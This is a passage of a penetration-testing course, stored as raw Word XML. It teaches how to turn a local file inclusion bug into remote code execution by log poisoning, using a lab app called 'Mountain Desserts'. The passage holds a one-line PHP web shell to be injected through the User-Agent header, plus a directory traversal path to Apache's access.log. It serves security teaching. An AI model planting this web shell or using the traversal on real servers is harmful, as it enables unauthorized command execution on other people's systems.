    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D3F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—----------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D42">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from XXXXXXXXX (9.2.1 Local File Inclusion (LFI))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D43">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D44">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the following example, our goal is to obtain Remote Code Execution (RCE) via an LFI vulnerability. We will do this with the help of Log Poisoning. Log Poisoning works by modifying data we send to a web application so that the logs contain executable code. In an LFI vulnerability scenario, the local file we include is executed if it contains executable content. This means that if we manage to write executable code to a file and include it within the running code, it will be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D45">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D46">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the following case study, we will try to write executable code to Apache's </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/log/apache2/ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory. We'll first need to review what information is controlled by us and saved by Apache in the related log. In this case, "controlled" means that we can modify the information before we send it to the web application. We can either read the Apache web server documentation or display the file via LFI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D47">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D48">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's use curl to analyze which elements comprise a log entry by displaying the file access.log using the previously found directory traversal vulnerability. This means we'll use the relative path of the log file in the vulnerable "page" parameter in the "Mountain Desserts" web application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D49">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D4A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1536700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="339" name="image328.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image328.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId583"/>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1D4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D4C">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 13 shows that the</w:t>
      </w:r>
      <w:hyperlink r:id="rId584">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId585">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">User Agent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is included in the log entry. Before we send a request, we can modify the User Agent in Burp and specify what will be written to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D4D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apart from the specified file, this command is equivalent to the directory traversal attack from the previous Learning Unit. The exploitation of directory traversal and LFI vulnerabilities mainly differs when handling executable files or content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D4E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's start Burp, open the browser, and navigate to the "Mountain Desserts" web page. We'll click on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> link at the bottom of the page, then switch back to Burp and click on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP history</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab. Let's select the related request and send it to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D4F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="159" name="image157.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image157.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58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1D50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D51">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now modify the User Agent to include the PHP code snippet of the following listing. This snippet accepts a command via the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter and executes it via the PHP</w:t>
      </w:r>
      <w:hyperlink r:id="rId587">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId588">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">system</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function on the target system. We'll use</w:t>
      </w:r>
      <w:hyperlink r:id="rId589">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId590">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">echo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to display command output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D52">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D53">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php echo system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 14 - PHP Snippet to embed in the User Agent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After modifying the User Agent, let's click Send.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3124200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58" name="image55.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image55.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId591"/>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1D58">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D59">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The PHP code snippet was written to Apache's access.log file. By including the log file via the LFI vulnerability, we can execute the PHP code snippet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D5A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D5B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To execute our snippet, we'll first update the page parameter in the current Burp request with a relative path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D5D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../../../var/log/apache2/access.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D5E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 15 - Relative Path for the "page" parameter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D5F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D60">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We also need to add the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to the URL to enter a command for the PHP snippet. First, let's enter the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to verify that the log poisoning is working. Since we want to provide values for the two parameters (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">page</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the relative path of the log and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for our command), we can use an ampersand (&amp;) as a delimiter. We'll also remove the User Agent line from the current Burp request to avoid poisoning the log again, which would lead to multiple executions of our command due to two PHP snippets included in the log.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D61">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The final Burp request is shown in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Request</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section of the following Figure. After sending our request, let's scroll down and review the output in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D62">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1308100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 10: Output of the specified ls command through Log Poisoning" id="351" name="image380.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 10: Output of the specified ls command through Log Poisoning" id="0" name="image380.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId592"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1308100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 10: Output of the specified ls command through Log Poisoning </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D63">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D64">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 10 shows the output of the executed </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command that was written to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access.log</w:t>
      </w:r>
